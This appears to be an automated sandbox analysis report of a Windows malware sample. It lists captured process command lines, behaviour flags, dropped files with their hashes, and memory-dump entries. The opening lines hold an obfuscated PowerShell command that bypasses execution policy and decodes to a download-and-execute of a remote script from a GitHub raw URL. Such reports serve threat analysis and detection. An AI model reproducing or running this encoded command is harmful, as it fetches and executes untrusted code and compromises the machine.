C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\15t4uk3p\15t4uk3p.dllMD5
a1b11e727dee086fd2ace43085c0cbf2
SHA199ca4a84378776ec0278a917f07228f0becae4bf
SHA25611855851592e47a78987a3ff9230360375cefb5fa85a44c958c6d49c574963fa
SHA51271b3a708ed48a69e12de1c96104ffc3aaaaa4c5513213c10df77c89e2fcbc98cfcfdc6dc01a54123cc59a1aef371fb28b543adf3ef94244748aba606b369c2f2
-
C:\Users\Admin\AppData\Local\Temp\RES2CEA.tmpMD5
d8ffa61f8e704aef73d1fc6e0e1a5054
SHA196b69ce2d6af20fc5e205fc39d79318448043d58
SHA256d7c2e957b0fbef31521578a4b6e3ce848536e63c4cc2ecf46373c0742e237cf5
SHA5127035b06af9d0054536de8b1286fb69333296f41799208a3b601328c4848d5df15760132827933907f352d1167e1922f79e3f7884c3129cc7d1b1dd30ed27af72
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
7cac19b2868c41555db4b71219217f9b
SHA1d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA5125bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\15t4uk3p\15t4uk3p.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\15t4uk3p\15t4uk3p.cmdlineMD5
ec79e044dd8372988fcd2f7eba45d055
SHA1447c522871bf66d39f99b0f6ff1ca62ae1441f04
SHA256090bd42371cf2a0a0aeefaa163e5054bcb923fee6bf74073abad0cf6fb05e4ee
SHA512f1c17ae8d87ee641f6d9f9f0ed2593e792f99285e70aa06ee205a7101fe3992391aa19afe03fe51eaf7390e9bfe407ddc8ae0befd76a9604f35b31c79b9e5035
-
\??\c:\Users\Admin\AppData\Local\Temp\15t4uk3p\CSCCD8AE2460FA4BD7A52E6D591908521.TMPMD5
02333d8589534d3e1abbab756254b6ed
SHA1166ab7273fec3dd4cf6ae26627db35f880ff366e
SHA2569e6342d14782866affec65027e42c16f9f6f878074ec683451a7d0c2d71dfc6c
SHA512ad9907f8ef59def859a7c0b26010b8bf4cade6a4a403834a90c45151a58098c234e6467d468b701b87bf07d39f20731211ec36892e1bbba6d3e729965bc39050
-
\Windows\Branding\mediasrv.pngMD5
eeb448ea2709c57b9ea2e223d0c79396
SHA138331dd027386151ee37a29a7820570a76427b02
SHA256c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.pngMD5
bb873bd05a47f502ee4ed3c4ea749a4f
SHA1e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/288-56-0x0000000000000000-mapping.dmp
-
memory/340-69-0x0000000000000000-mapping.dmp
-
memory/400-66-0x0000000000000000-mapping.dmp
-
memory/400-13-0x0000000000000000-mapping.dmp
-
memory/560-57-0x0000000000000000-mapping.dmp
-
memory/564-65-0x0000000000000000-mapping.dmp
-
memory/636-53-0x0000000000000000-mapping.dmp
-
memory/688-52-0x0000000000000000-mapping.dmp
-
memory/748-54-0x0000000000000000-mapping.dmp
-
memory/752-40-0x0000000000000000-mapping.dmp
-
memory/808-76-0x0000000000000000-mapping.dmp
-
memory/872-47-0x0000000000000000-mapping.dmp
-
memory/872-77-0x0000000000000000-mapping.dmp
-
memory/900-46-0x0000000000000000-mapping.dmp
-
memory/1020-63-0x0000000000000000-mapping.dmp
-
memory/1032-0-0x00000000010C0000-0x00000000013FD000-memory.dmpFilesize
3.2MB
-
memory/1032-62-0x0000000000000000-mapping.dmp
-
memory/1032-1-0x0000000001400000-0x0000000001411000-memory.dmpFilesize
68KB
-
memory/1052-10-0x0000000000000000-mapping.dmp
-
memory/1052-49-0x0000000000000000-mapping.dmp
-
memory/1136-55-0x0000000000000000-mapping.dmp
-
memory/1184-50-0x0000000000000000-mapping.dmp
-
memory/1184-87-0x0000000000000000-mapping.dmp
-
memory/1212-70-0x0000000000000000-mapping.dmp
-
memory/1216-58-0x0000000000000000-mapping.dmp
-
memory/1316-64-0x0000000000000000-mapping.dmp
-
memory/1316-73-0x0000000000000000-mapping.dmp
-
memory/1328-48-0x0000000000000000-mapping.dmp
-
memory/1436-33-0x0000000002300000-0x0000000002301000-memory.dmpFilesize
4KB
-
memory/1436-7-0x00000000024E0000-0x00000000024E1000-memory.dmpFilesize
4KB
-
memory/1436-3-0x000007FEF5520000-0x000007FEF5F0C000-memory.dmpFilesize
9.9MB
-
memory/1436-4-0x0000000002350000-0x0000000002351000-memory.dmpFilesize
4KB
-
memory/1436-5-0x000000001AC10000-0x000000001AC11000-memory.dmpFilesize
4KB
-
memory/1436-6-0x00000000023B0000-0x00000000023B1000-memory.dmpFilesize
4KB
-
memory/1436-2-0x0000000000000000-mapping.dmp
-
memory/1436-9-0x000000001C130000-0x000000001C131000-memory.dmpFilesize
4KB
-
memory/1436-17-0x00000000023A0000-0x00000000023A1000-memory.dmpFilesize
4KB
-
memory/1436-38-0x00000000022D0000-0x00000000022E0000-memory.dmpFilesize
64KB
-
memory/1436-18-0x00000000028E0000-0x00000000028E1000-memory.dmpFilesize
4KB
-
memory/1436-35-0x000000001B6E0000-0x000000001B6E1000-memory.dmpFilesize
4KB
-
memory/1436-34-0x0000000002310000-0x0000000002311000-memory.dmpFilesize
4KB
-
memory/1436-21-0x000000001B5C0000-0x000000001B5C1000-memory.dmpFilesize
4KB
-
memory/1468-61-0x0000000000000000-mapping.dmp
-
memory/1544-95-0x00000000012B0000-0x00000000012B1000-memory.dmpFilesize
4KB
-
memory/1544-99-0x0000000019490000-0x0000000019491000-memory.dmpFilesize
4KB
-
memory/1544-97-0x0000000019460000-0x0000000019461000-memory.dmpFilesize
4KB
-
memory/1544-96-0x0000000019450000-0x0000000019451000-memory.dmpFilesize
4KB
-
memory/1544-106-0x0000000019480000-0x0000000019481000-memory.dmpFilesize
4KB
-
memory/1544-98-0x0000000019480000-0x0000000019481000-memory.dmpFilesize
4KB
-
memory/1544-107-0x000000001A1B0000-0x000000001A1B1000-memory.dmpFilesize
4KB
-
memory/1544-114-0x00000000195D0000-0x00000000195D1000-memory.dmpFilesize
4KB
-
memory/1544-44-0x0000000000000000-mapping.dmp
-
memory/1544-90-0x0000000001260000-0x0000000001261000-memory.dmpFilesize
4KB
-
memory/1544-79-0x0000000000000000-mapping.dmp
-
memory/1544-80-0x000007FEF5520000-0x000007FEF5F0C000-memory.dmpFilesize
9.9MB
-
memory/1544-115-0x000000001AC60000-0x000000001AC61000-memory.dmpFilesize
4KB
-
memory/1556-85-0x0000000000000000-mapping.dmp
-
memory/1564-45-0x0000000000000000-mapping.dmp
-
memory/1608-43-0x0000000000000000-mapping.dmp
-
memory/1636-39-0x0000000000000000-mapping.dmp
-
memory/1684-74-0x0000000000000000-mapping.dmp
-
memory/1688-71-0x0000000000000000-mapping.dmp
-
memory/1688-41-0x0000000000000000-mapping.dmp
-
memory/1720-42-0x0000000000000000-mapping.dmp
-
memory/1736-72-0x0000000000000000-mapping.dmp
-
memory/1816-36-0x0000000000000000-mapping.dmp
-
memory/2016-78-0x0000000000000000-mapping.dmp
-
memory/2040-51-0x0000000000000000-mapping.dmp